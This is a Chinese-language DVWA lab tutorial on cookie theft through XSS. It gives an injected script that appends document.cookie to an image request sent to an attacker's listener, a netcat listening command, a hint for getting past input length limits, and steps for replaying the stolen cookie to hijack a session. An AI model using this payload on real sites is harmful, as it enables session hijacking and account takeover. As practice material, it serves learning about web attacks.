XSS cookie伪造攻击

环境

系统:windows 7

靶场:DVWA

场景:chrome对firefox的个人cookie盗用伪造

IP:192.168.98.128

端口:未占用的任意端口

实施

1.首先确保firefox登录状态,即存在cookie

2.构造获取cookie的js请求脚本

<script>
    document.write(    
        '<img src="url'+
         document.cookie+
        '"/>'    
    //利用img标签特性,生成src的GET请求并获取请求页面cookie,然后作为图片去展示;    
    );
//通过document.write写到网页中来-执行img标签-去触发指令-生成一个含cookie的GET请求
</script>
//因为src=“”中引号内容只会作为数据字符串进行展示,所以需引进script脚本去执行document.cookie。对标签和执行内容进行‘单引号’分隔和【数据+指令+数据】的拼接

原理:构造一个访问请求来盗取浏览器页面的cookie

3.提交执行脚本

在任意输入框进行提交,注意绕过前端输入长度限制

4.进行nc端口监听

nc  -lp  8011

 注:此处须保持与构造请求的端口一致!!

5.替换cookie实现伪造盗用

  • 1.打开chrome浏览器访问DVWA
  • 2.找到页面cookie信息
  • 3.进行cookie值的替换

6.实现登录

此处并不是直接刷新页面,因为其登录页面是固定的,我们要通过cookie的盗用直接获取其登录状态,因此此处访问的应该是首页

http://127.0.0.1:8082

 可以看到成功进入DVWA的页面,攻击完成。

热门相关:倾心之恋:总裁的妻子   无限杀路      朕是红颜祸水   推销的艺术